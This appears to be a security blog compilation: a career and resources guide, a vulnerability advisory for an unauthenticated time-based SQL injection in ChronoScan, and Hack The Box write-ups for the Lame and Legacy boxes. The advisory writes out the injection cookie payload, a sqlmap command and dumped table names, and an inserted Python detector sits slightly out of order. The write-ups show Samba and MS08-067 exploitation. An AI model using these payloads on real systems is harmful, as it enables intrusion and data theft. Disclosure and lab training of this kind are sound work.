RedSec

Another Information Security Blog

InfoSec is very much a hands-on field, as you have to know a little bit about a lot of different things. I don’t suggest taking classes (a lot of them are just snake oil), as there are so many different resources online that cost very little and give you a lab environment to test in. I’ll outline all the ones I use and trust below. All of this assumes you have basic knowledge of how computers and networks operate. If you can’t explain what happens (at a highish level) when your computer makes a request to https://google.com, I suggest you take the CompTIA Network+ and CompTIA Security+ prior to deep diving into security. If you know how things work (definitely relative 😃), or feel comfortable with your knowledge, skip those two. InfoSec is not a hold-my-hand field. You will fail at things and not understand why. I fail at things and do not understand why. Following a very popular phrase in the InfoSec world: simply, Try Harder. You must get your hands dirty to really succeed in InfoSec. I highly suggest you all open an account in AWS and build your labs there. If you don’t know how AWS works, there are a plethora of resources on how to do it. Or, sign up and poke around; you’ll get it. At the end of the day, you have to be able to find the answer if you don’t know it. On to the good stuff: the next section is about what types of jobs there are in InfoSec (and what is required), followed by learning resources, and finally, a way to keep up to date with news.

Jobs, Positions, and Certs

Breaking into security is very difficult. Unfortunately, many people spend years trying to get into it. This is because nearly every security job requires previous experience in security. However, you can do some things that will greatly increase your chances. The first thing I would do is identify what type of security truly interests you. Below are some of the types of security positions. With all of these positions, having strong analytical skills is a must.

• InfoSec/SOC Analyst
  o Looks at security software alerts and triages them. Basically the front man for security alerts and incidents. Should have a good understanding of a lot of different topics (pen testing, incident response, etc.). Being able to correlate incidents and alerts is key to this position.
• InfoSec Engineer
  o Builds/deploys security systems and tools for the analysts to use. Has a deep understanding of how things function and how they are architected.
• InfoSec Software Engineer (sometimes just called software engineer if the parent org is a security company)
  o A programmer that specializes in security software. If you like programming, I suggest this; there is a huge market for it.
• Forensics
  o A highly technical position that requires a lot of knowledge about attacks and how they work, as well as understanding how to handle and gather evidence and do attribution/correlation.
• Penetration Tester/Red Team
  o Penetration testing is basically a hacker who is paid by companies to attempt to break into them, or an internal person who vets applications in the same way. For example, I pen test all of our web apps (and vendors) before we allow them to run code in our environment.
  o Red teaming is an extension of pen testing where a team of pen testers has very long (months/years) engagements in which they emulate a real APT (advanced persistent threat) actor.
• Incident Response/SOC Analyst/Blue Team
  o Responds to events from security tools and gathers intel on events.
• Malware Analyst/Reverse Engineering
  o Dissects malware for AV companies to learn more about it. If you like debugging apps and assembler, this is the spot for you.

Each company is fairly different and there is no set way on what types of positions companies hire for. The more intro positions are analyst spots or junior pen testers. A great way to get into information security is to get into a help desk spot where you are constantly fixing things. This exponentially helps your knowledge of “how things work.” You definitely can jump right into an InfoSec position; however, it would be really helpful to have some good certs to back up your experience. To expand on this, here are some certs that are good (beware, there are a TON of crap certs that are marketed well):

• CompTIA Network+
  o Great introduction and shows you have an understanding of “how things work.”
• CompTIA Security+
  o Great introduction to security.
• CEH
  o To be frank, I hate recommending this cert… even though I have it. It’s multiple choice and very simple. I was thoroughly disappointed with it.
• OSCP
  o This is the “gold standard” of penetration testing certs. No multiple choice here. You have 24 hours to hack into various machines in their lab environment. Then, you have to write a report about it. There are no limits on what you are allowed to use; they encourage you (and you kind of have to) to use any resource you need (i.e., Google). People fail multiple times before they pass it. The course and test are about $1200, but a retest is only $60. As you can see, they expect you to fail.
• OSCE
  o Big brother to the OSCP, extremely hard cert. 48 hour lab, focusing on exploit development and bypassing DEP, ASLR, and other endpoint protections.
• SANS Certs
  o SANS is an organization that offers a master’s in cyber security (super expensive) and that has probably the highest quality certs available. They have courses in every different aspect of security. This comes at a price though. The courses are only taught in person (group setting, at multiple different locations a year), by simulcast (live feed), or by online material (pre-recorded classes). They start at $6,000. Normally, companies pay for SANS certs; however, you are more than welcome to fork over that amount.
  o Here is their “roadmap”: https://sans.org/roadmap

With the CompTIA and CEH, you can buy the official book and pass relatively easily. The OSCP/E and SANS course material are only available through the companies themselves. If you are going to go for one of the first three certs, again, I highly recommend you learn how things work by building stuff out in AWS. It’s cheap and you can’t mess anything up (or if you do, shut it all down and restart 😃). On to the learning resources.

Learning Resources

I’m going to list a lot of things that I use currently and have used in the past. This is by no means a full list of everything. These are, in my opinion, the top resources for learning hacking/security. I’ve also attached my bookmarks folder for additional resources I’ve found helpful.

• Books
  o Web Hacking 101 (great read with examples; this is a copy that I bought and uploaded to Drive to share) – https://drive.google.com/file/d/0B3UiWsJrcvPyZmpTVTFoeVhYdGs/view?usp=sharing
  o ($) The “go-to” introduction book for hacking – https://nostarch.com/pentesting
  o ($) Hacker Playbook 2 (second edition, more up to date) – https://amzn.to/2NTDNok
  o ($) Hacker Playbook 3 (red team edition, more advanced attacks) – https://amzn.to/2DdM4PS
  o ($) Advanced Penetration Testing (very complex methods) – https://amzn.to/2ODGfwu
  o ($) Art of Exploitation (I would read this one last; old, but an overall good read) – https://amzn.to/2pm0FyM
  o ($) Anything published by No Starch Press. They have high quality InfoSec books with great material, covering a wide variety of topics (not just hacking) including malware analysis and programming – https://nostarch.com/catalog/security
  o Two books that are on my desk are the RTFM and BTFM; both are like $10 and so worth it if you have a job in InfoSec.
    ▪ RTFM (Red Team Field Manual) – https://amzn.to/2xzCMYq
    ▪ BTFM (Blue Team Field Manual) – https://amzn.to/2DcAWCP
• Online learning material
  o (free and paid) Hack The Box (pen testing labs; you have to “hack” your way in). I use this almost daily. Insanely good resource for hands-on labs. The paid membership is well worth it. – https://www.hackthebox.eu/
  o (free and paid) Pentester Lab, web application specific, excellent resource for learning web application attacks. I highly recommend “Web for Pentester” and “Web for Pentester II” as they give detailed walkthroughs of each type of vulnerability and how to find it – https://pentesterlab.com/
    ▪ https://pentesterlab.com/exercises/web_for_pentester
    ▪ https://pentesterlab.com/exercises/web_for_pentester_II
  o (free) VulnHub: people post intentionally vulnerable ISOs. They range in difficulty. – https://www.vulnhub.com/
    ▪ You have to launch these in a VM locally.
  o (paid) Virtual Hacking Labs (haven’t used it as it’s a little pricey, but I’ve heard great things about it) – https://www.virtualhackinglabs.com/

There is a ton of material out there. I highly recommend starting with this list and expanding. To do a lot of these, you will need a Linux VM. Either use VirtualBox or VMware Workstation (or AWS) to host your hacking box. I recommend using Kali Linux; it has nearly every tool you need pre-installed and it’s made/kept up to date by the company that makes the OSCP/OSCE… They know what they are doing.

Ways to Keep Up To Date

Podcasts:
* SANS ISC – Daily podcast reviewing news, very short, 5 min – https://isc.sans.edu/podcast.html
* Risky Business – Weekly podcast on Tuesdays (sometimes specials during the week). Really good one reviewing news, 1 hour long – https://risky.biz
* Rally Sec – Decent, just started listening to this one
* Unsupervised Learning – Tech podcast covering all of tech news. I like this one a lot for general stuff.

Twitter (not even kidding): just go to my “people I follow” list and if they have something to do with security in their name or bio, follow them. There are too many to name here. Seriously, it’s insane how great Twitter is for keeping up to date. I’ll find out about new threats days before they are officially reported on.

Conclusion

That was a lot of stuff. I recommend taking a little bit of time to read it all again to thoroughly understand it. After that, there is no real starting point, so just dive right in.

Background

ChronoScan is OCR software created by ChronoScan Capture S.L. that reads and parses data from the documents it receives. The software takes a document/PDF and, based on how you have it set up, parses selected data from the input file. This is especially helpful where an automated process sends a high number of documents that need to be put into a database or some other type of storage quickly. There are community and enterprise versions.

Vulnerability

I've identified an unauthenticated time-based SQL injection in the latest ChronoScan enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions, but due to the nature of the attack (unauthenticated, no specific parameters, etc.), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used to identify users and the sessions associated with them. It seems the wcr_machineid cookie value is inserted unsanitized into a SQL statement that checks the current “machine’s” access level. An unauthenticated attacker can (even without a valid wcr_machineid cookie) exploit a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (which asks for a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following sqlmap command, which confirmed the vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"
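For defenders watching proxy or web-server logs for this kind of probe, the following is an added example (not ChronoScan or sqlmap code): it parses a raw HTTP request, URL-decodes the wcr_machineid cookie and reports time-based SQL injection indicators such as the MSSQL WAITFOR DELAY seen above. The expected machine-id alphabet is an assumption; adjust it to the real token format.

```python
"""Flag time-based SQL injection attempts in the ChronoScan wcr_machineid cookie."""
import re
from urllib.parse import unquote

# Assumed: a legitimate machine id is an opaque alphanumeric token (adjust to the real format).
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Indicators typical of blind/time-based injection against MSSQL (the system
# databases master/msdb/tempdb in the dump above identify the backend) and others.
INDICATORS = {
    "mssql_waitfor": re.compile(r"waitfor\s+delay", re.I),
    "quote_then_close": re.compile(r"['\"]\s*[);]"),
    "sql_comment": re.compile(r"--|/\*"),
    "sleep_function": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
}


def parse_cookies(raw_request: str) -> dict:
    """Return the cookies from the Cookie header of a raw HTTP request."""
    for line in raw_request.splitlines():
        if line.lower().startswith("cookie:"):
            cookies = {}
            for part in line.split(":", 1)[1].split(";"):
                if "=" in part:
                    name, value = part.strip().split("=", 1)
                    cookies[name] = value
            return cookies
    return {}


def check_machineid(cookie_value: str) -> list:
    """Return the names of indicators triggered by the decoded wcr_machineid value."""
    decoded = unquote(cookie_value)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not TOKEN_RE.match(decoded):
        hits.append("outside_token_alphabet")
    return hits


def check_request(raw_request: str) -> list:
    """Empty list means nothing suspicious (or no wcr_machineid cookie at all)."""
    value = parse_cookies(raw_request).get("wcr_machineid")
    return check_machineid(value) if value else []


# Constructed samples: PROBE mirrors the advisory's request, BENIGN carries a plain token.
PROBE = ("GET / HTTP/1.1\r\nHost: vulnerable:10000\r\n"
         "Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1\r\n\r\n")
BENIGN = "GET / HTTP/1.1\r\nHost: vulnerable:10000\r\nCookie: wcr_machineid=VQWist5qQW3IS6uy; wcr_repw=1\r\n\r\n"

if __name__ == "__main__":
    print(check_request(PROBE))   # -> ['mssql_waitfor', 'quote_then_close', 'sql_comment', 'outside_token_alphabet']
    print(check_request(BENIGN))  # -> []
```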

After confirmation, I dumped the following databases.

[*] CHRONOSCAN
[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache
(snip)

Timeline

- August 24, 2018: Vulnerability identified
- August 24, 2018: Vendor notified & acknowledged
- August 24, 2018: CVE ID requested
- August 24, 2018: CVE-2018-15868 reserved
- August 27, 2018: Details provided to MITRE
- August 28, 2018: Vendor issues patch for verification (not public yet)

The “Lame” box was categorized as an easy-intermediate box, so I decided that it would be next on my list.

I found it to be fairly easy, giving it a 2 out of 10 for difficulty.


Intelligence Gathering

Data Given: IP: 10.10.10.3 OS: Linux

I first pinged the host and confirmed that it was up. I then ran the following nmap scan for a general sweep of what ports were open. I do these types of scans to find any low hanging fruit that may be there.

nmap -sS -sC -sV -T4 10.10.10.3

Okay, so we have a few things that look interesting. The out-of-date vsftpd & Samba are probably how we want to get in. I looked around online for the Samba version as I think I had heard of a large exploit for that recently. Luckily, Rapid7 had a module at the top of my search.

The version that it was reporting was “3.0.20”, which correlates with the version that Rapid7 reported for the “username map script” RCE.


Exploitation

This module does not support checking, so we are going to have to trust that nmap was not lying to us.


Post Exploitation

It wasn't! Unfortunately, this dropped us into a limited shell. Pentest Monkey (http://pentestmonkey.net/blog/post-exploitation-without-a-tty) has a great way to gain a full TTY shell. Since I am comfortable with Python, I used the following command to see if it was installed.

whereis python

Now that I know it is installed (and I can use it), I run the following command to gain a full TTY shell.

python -c 'import pty; pty.spawn("/bin/sh")'

We are already root, so let's grab the flags and move on to the next one.


Conclusion

I did have a trip-up when I was initially trying to hack this box. I went for the vsftpd daemon first, but for some reason couldn't get a shell back. I'm going to attribute the name “Lame” to that very reason. I liked this one, but I think in the future I am going to stop relying on Metasploit so much and try to learn to use Python/Ruby scripts to send the exploits.

After taking a break from writing blogs about hacking, I thought I'd jump back into it. This write up is going to be covering the “Legacy” box from Hack The Box. If you haven't seen or heard about Hack The Box, I highly recommend you try it out.

I chose Legacy as it is a retired box, which means you can do a write-up about it. I will be trying to hack all of the retired boxes and writing about my experiences.

Intelligence Gathering

Data given: IP: 10.10.10.4 OS: Windows

I first pinged the remote host to confirm it was online. I then ran an nmap scan with the parameters below.

nmap 10.10.10.4

Knowing that ports 139 and 445 were open, I ran a more targeted scan to enumerate more about those services.

nmap -sC -sV -A -p139,445,3389 10.10.10.4

This is a much more interesting scan result. It looks to be a Windows XP or 2000 box. I assume the name of the box, “Legacy”, refers to the version.


Vulnerability Analysis

I did a quick search with searchsploit for “Windows 2000” and noticed this result.


Exploitation

I fired up Metasploit and loaded the module for MS08-067.

I set the target to the remote host and, to verify that it was actually vulnerable, I used the “check” command in Metasploit.

Sweet! Let's exploit now! Awesome, it worked!


Post Exploitation

The next goal is to get the flags for both the user and root (Administrator in this case). Both flags are on each user's desktop. To do this, I'll drop into a shell session on the host. I need to see if I can get the flags without having to do any sort of privesc. I was able to grab the user flag without having to do any sort of privesc. Now, let's try the same thing for the Administrator account. Alright! That wasn't bad at all. On to the next one!


Conclusion

This was a very easy lab that had us use MS08-067 on a Windows XP computer. I didn't use any outside resources on this one besides searchsploit, which can be found here. Looking forward to the next one!